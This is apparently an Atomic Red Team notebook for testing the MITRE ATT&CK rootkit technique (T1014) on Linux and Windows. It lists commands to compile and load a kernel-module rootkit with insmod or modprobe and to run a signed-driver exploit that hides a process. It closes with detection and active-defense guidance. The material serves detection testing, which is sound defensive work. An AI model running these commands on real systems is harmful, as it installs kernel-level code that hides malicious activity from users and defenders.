{
 "cells": [
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "# T1014 - Rootkit",
    "\n",
    "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) \n\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Atomic Tests"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "#Import the Module before running the tests.\n# Checkout Jupyter Notebook at https://github.com/haresudhan/TheAtomicPlaybook to run PS scripts.\nImport-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #1 - Loadable Kernel Module based Rootkit\nLoadable Kernel Module based Rootkit\n\n**Supported Platforms:** linux\nElevation Required (e.g. root or admin)\n#### Dependencies:  Run with `bash`!\n##### Description: The kernel module must exist on disk at specified location (#{rootkit_path})\n\n##### Check Prereq Commands:\n```bash\nif [ -f PathToAtomicsFolder/T1014/bin/T1014.ko ]; then exit 0; else exit 1; fi;\n\n```\n##### Get Prereq Commands:\n```bash\nif [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; touch /tmp/T1014/safe_to_delete; fi;\ncp PathToAtomicsFolder/T1014/src/Linux/* /tmp/T1014/\ncd /tmp/T1014; make\nmv /tmp/T1014/T1014.ko PathToAtomicsFolder/T1014/bin/T1014.ko\n[ -f /tmp/T1014/safe_to_delete ] && rm -rf /tmp/T1014\n\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1014 -TestNumbers 1 -GetPreReqs"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "#### Attack Commands: Run with `sh`\n```sh\nsudo insmod PathToAtomicsFolder/T1014/bin/T1014.ko\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1014 -TestNumbers 1"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #2 - Loadable Kernel Module based Rootkit\nLoadable Kernel Module based Rootkit\n\n**Supported Platforms:** linux\nElevation Required (e.g. root or admin)\n#### Dependencies:  Run with `bash`!\n##### Description: The kernel module must exist on disk at specified location (#{rootkit_path})\n\n##### Check Prereq Commands:\n```bash\nif [ -f /lib/modules/$(uname -r)/T1014.ko ]; then exit 0; else exit 1; fi;\n\n```\n##### Get Prereq Commands:\n```bash\nif [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; touch /tmp/T1014/safe_to_delete; fi;\ncp PathToAtomicsFolder/T1014/src/Linux/* /tmp/T1014/\ncd /tmp/T1014; make        \nsudo cp /tmp/T1014/T1014.ko /lib/modules/$(uname -r)/\n[ -f /tmp/T1014/safe_to_delete ] && rm -rf /tmp/T1014\nsudo depmod -a\n\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1014 -TestNumbers 2 -GetPreReqs"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "#### Attack Commands: Run with `sh`\n```sh\nsudo modprobe T1014\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1014 -TestNumbers 2"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #3 - Windows Signed Driver Rootkit Test\nThis test exploits a signed driver to execute code in Kernel.\nSHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7\nWe leverage the work done here:\nhttps://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html\nThe hash of our PoC Exploit is\nSHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441\nThis will simulate hiding a process.\nIt would be wise if you only run this in a test environment\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\npuppetstrings C:\\Drivers\\driver.sys\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1014 -TestNumbers 3"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Detection",
    "\n",
    "Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Shield Active Defense\n### Admin Access \n Modify a user's administrative privileges. \n\n Changing the target system to allow or disallow users to perform tasks requiring administrator level permissions gives the defender leverage in inhibiting or facilitating attacks.  The procedures for changing these permissions vary across different operating and software systems.\n#### Opportunity\nThere is an opportunity to block an adversary's intended action and force them to reveal additional TTPs.\n#### Use Case\nA defender could remove admin access in an attempt to force an adversary to perform privilege escalation to install a rootkit.\n#### Procedures\nRemove an account's administrative access from a system or service to require an adversary to reveal techniques for elevating privileges in order to accomplish certain tasks.\nGrant an account administrative access to a system or service to enable an adversary to take advantage of those privileges if they compromise the system or service."
   ]
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": ".NET (PowerShell)",
   "language": "PowerShell",
   "name": ".net-powershell"
  },
  "language_info": {
   "file_extension": ".ps1",
   "mimetype": "text/x-powershell",
   "name": "PowerShell",
   "pygments_lexer": "powershell",
   "version": "7.0"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 4
}